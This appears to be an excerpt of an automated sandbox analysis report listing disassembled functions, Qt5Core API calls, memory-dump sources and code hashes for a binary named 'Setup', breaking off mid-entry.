                                                                                                                                                              • Opcode Fuzzy Hash: c04b2e8455bb8008d29c7b3c6e1750352162103cced9b0fb7cceb4a00b0194ce
                                                                                                                                                              • Instruction Fuzzy Hash: 08310C72509B8181D781DF34E9803AC73A8FB54BA8F444236CEAD4B6E9DF38C059CB51
                                                                                                                                                              Function 00007FFBA198ABE0 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@Array@@Byte$?detach@?dispose@?end@Data@1@Data@1@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3108718021-0
                                                                                                                                                              • Opcode ID: 5a8186f90f3d05f362491c6b6c5c1c9712729e0f30eb3c665c692fefd9754856
                                                                                                                                                              • Instruction ID: 84e997c349f5f6a8fbe5a2f774d194f25a02f99d0ffa6160870e2c3a0f244b14
                                                                                                                                                              • Opcode Fuzzy Hash: 5a8186f90f3d05f362491c6b6c5c1c9712729e0f30eb3c665c692fefd9754856
                                                                                                                                                              • Instruction Fuzzy Hash: A321A172F0AB4286DB618F22F9441B9A361FB85BA4B4C4131DE9E47754DF3CE446CB00
                                                                                                                                                              Function 00007FFBA1A26BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(00000000,?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C3F
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C57
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C66
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C75
                                                                                                                                                                • Part of subcall function 00007FFBA1A24FA0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,00000000,00007FFBA1A256B9), ref: 00007FFBA1A24FD6
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A26CEC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$ArrayDataPtr@@@$A@$$CriticalEnterInit_thread_footerSectionV0@@
                                                                                                                                                              • String ID: ---
                                                                                                                                                              • API String ID: 3140829187-2854292027
                                                                                                                                                              • Opcode ID: 4f0035a8fdbe61973d7063f08b901a4930dd696f0de6ac7d39c71159863fd9d4
                                                                                                                                                              • Instruction ID: 41cfe6a4a69dc2a3efb8b996a971f195ce7f4f6e4d0c25da45b1214a73255b9e
                                                                                                                                                              • Opcode Fuzzy Hash: 4f0035a8fdbe61973d7063f08b901a4930dd696f0de6ac7d39c71159863fd9d4
                                                                                                                                                              • Instruction Fuzzy Hash: 17313AA5D0EA8681EB929B35E8443B56361AB94760F444233CE6E072A5EF7CEC48CF00
                                                                                                                                                              Function 00007FFBA197DAE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListLocker@@Mutex$?begin@?end@?lock@Mutex@@
                                                                                                                                                              • String ID: https
                                                                                                                                                              • API String ID: 3809823600-1056335270
                                                                                                                                                              • Opcode ID: b36d647be4a169d49bdaf18d9f092376bbbbd65262a0204930a15529d99372b6
                                                                                                                                                              • Instruction ID: 9bdfa730d76d1de802620578ec9698c619e39e316d0abcd39e13d9c5a3060a7c
                                                                                                                                                              • Opcode Fuzzy Hash: b36d647be4a169d49bdaf18d9f092376bbbbd65262a0204930a15529d99372b6
                                                                                                                                                              • Instruction Fuzzy Hash: 012141A5A0EA8285EB82DB26E854179A7E0FF88BD4B854031DD5D47764FF3CE446CB10
                                                                                                                                                              Function 00007FFBA19F4DA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char@@$Char@@@Latin1$String@@$?data@Initialization@Qt@@@
                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                              • API String ID: 1723617539-2554083253
                                                                                                                                                              • Opcode ID: 858aee6db04ec795aabcccf751c2afa29cf567cd324237ba9cf12b8a0ab94aca
                                                                                                                                                              • Instruction ID: 833c2bbcafcd8723314b3507878c6ea24d7684eeb36d8cc65dcd66b738f1b9d2
                                                                                                                                                              • Opcode Fuzzy Hash: 858aee6db04ec795aabcccf751c2afa29cf567cd324237ba9cf12b8a0ab94aca
                                                                                                                                                              • Instruction Fuzzy Hash: 2D11DA6361A7A182D7538F26E800179B7A1FF81B65F054032EE9987A55EE3CE449CF50
                                                                                                                                                              Function 00007FFBA1A224A0 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?set$Parent@U1@@V0@@$?color@?createArray@@ByteColor@Color@1@Color@1@@DataNode@U2@_Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3483191816-0
                                                                                                                                                              • Opcode ID: 2ab7c3a789dc246fbdce654c0a835e2f6bd8730dde57a8c42d59dac00c5de52c
                                                                                                                                                              • Instruction ID: d05846331b2caeff5827b2b4728a5a2faa122fa8043873215bee962988a5eaf8
                                                                                                                                                              • Opcode Fuzzy Hash: 2ab7c3a789dc246fbdce654c0a835e2f6bd8730dde57a8c42d59dac00c5de52c
                                                                                                                                                              • Instruction Fuzzy Hash: 60214F62B09A5282EB85DF32E8143696371FB88F94F448132CE5E47B68EF3CE455CB40
                                                                                                                                                              Function 00007FFBA1A1E080 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?set$Array@@ByteParent@U1@@V0@@$?color@?createColor@Color@1@Color@1@@DataNode@U2@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2305653893-0
                                                                                                                                                              • Opcode ID: 99953bb7129aac45debdf9136aeff40ed1c4041408bcc346d3c3dc2c3cb73a38
                                                                                                                                                              • Instruction ID: d70be705f78d8bbd6311c03624540029d8e6d7db75f85b81baace86214f4cafd
                                                                                                                                                              • Opcode Fuzzy Hash: 99953bb7129aac45debdf9136aeff40ed1c4041408bcc346d3c3dc2c3cb73a38
                                                                                                                                                              • Instruction Fuzzy Hash: 18214FB2B0AA5282EB46DF22E8543696361FB88F94F444532CE5D47B18EF3CD455CB40
                                                                                                                                                              Function 00007FFBA1A28020 Relevance: 10.6, APIs: 7, Instructions: 53timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A28029
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A28034
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2804E
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A280B7
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2416D
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2417E
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241A2
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241B0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241C0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241CB
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241D6
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A280D9
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A280FC
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A28117
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$BasicTimer@@$?from?sharedArrayBase64@Data@@DateNull@Time@@V0@$$V0@@V1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 318536080-0
                                                                                                                                                              • Opcode ID: 55ed906245562dbcaf53c3eae23b1a8c4e277417abf4286f903468fadc96b2f7
                                                                                                                                                              • Instruction ID: 779039a4ec1c6183e09491eb4b22712402f3b1dab7b168ccd326f17de0503f6c
                                                                                                                                                              • Opcode Fuzzy Hash: 55ed906245562dbcaf53c3eae23b1a8c4e277417abf4286f903468fadc96b2f7
                                                                                                                                                              • Instruction Fuzzy Hash: BA31FBB2A1AB4681DB81DF35E8442A833A4FB09B28F404136DD6E473A9FF38D448CF40
                                                                                                                                                              Function 00007FFBA19D9E40 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9E6A
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9E8F
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9E9D
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9EAD
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9EB8
                                                                                                                                                                • Part of subcall function 00007FFBA19D9BF0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,000000E8,00007FFBA19D9E57,?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9C30
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$?warning@BasicCategory@@Enabled@H00@LoggingTimer@@Warning
                                                                                                                                                              • String ID: Invalid stream window size
                                                                                                                                                              • API String ID: 3560238351-1021882108
                                                                                                                                                              • Opcode ID: f730e2e0fdb214abbe577630895fbeba761958d52010c810bf3df7e410c09238
                                                                                                                                                              • Instruction ID: 538ef9d0a13774d0f1581d556c01265f511dfca228f5af13569fc79eb63ac71b
                                                                                                                                                              • Opcode Fuzzy Hash: f730e2e0fdb214abbe577630895fbeba761958d52010c810bf3df7e410c09238
                                                                                                                                                              • Instruction Fuzzy Hash: AD0171A1E1A55282EB82AB31E45506973A2FF88B65B445136DE6E47261EE3CE14ACF00
                                                                                                                                                              Function 00007FFBA19D9DB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9DDA
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9DFF
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9E0D
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9E1D
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9E28
                                                                                                                                                                • Part of subcall function 00007FFBA19D9BF0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,000000E8,00007FFBA19D9E57,?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9C30
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$?warning@BasicCategory@@Enabled@H00@LoggingTimer@@Warning
                                                                                                                                                              • String ID: Invalid session window size
                                                                                                                                                              • API String ID: 3560238351-2314003836
                                                                                                                                                              • Opcode ID: 531740d56f922ee4f6bff27d5de3c1da722d6fa8dec881fc8287384be103476d
                                                                                                                                                              • Instruction ID: 84a6aeaad166f653bb80ab526f5d2a0afec6e3e749c3d45909f32c4d2fbcf2fe
                                                                                                                                                              • Opcode Fuzzy Hash: 531740d56f922ee4f6bff27d5de3c1da722d6fa8dec881fc8287384be103476d
                                                                                                                                                              • Instruction Fuzzy Hash: FC01D4E1E1A65282EF82AB31E45517973A2FF88B61F445136DE5D07261EE3CD04ACF00
                                                                                                                                                              Function 00007FFBA1A24150 Relevance: 10.5, APIs: 7, Instructions: 35timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2416D
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2417E
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241A2
                                                                                                                                                              • ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241B0
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241C0
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241CB
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241D6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$?fromBase64@BasicDateString@@Time@@Timer@@V0@$$V0@@V1@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1593142784-0
                                                                                                                                                              • Opcode ID: 40e1e0ff396f56149cb166224a5f41f18a2bfdac9c3d03ee4dde489727f2ff19
                                                                                                                                                              • Instruction ID: 1250f7d4b4038de9d245ae7854a19b0540207bdd495beff60ed5e6ac96f801a3
                                                                                                                                                              • Opcode Fuzzy Hash: 40e1e0ff396f56149cb166224a5f41f18a2bfdac9c3d03ee4dde489727f2ff19
                                                                                                                                                              • Instruction Fuzzy Hash: 9C012D7261EA4282EB819B21F8541697361FF84BA5F448032DE6E47798EF3CD449CF40
                                                                                                                                                              Function 00007FFBA1991CD0 Relevance: 10.5, APIs: 7, Instructions: 35COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
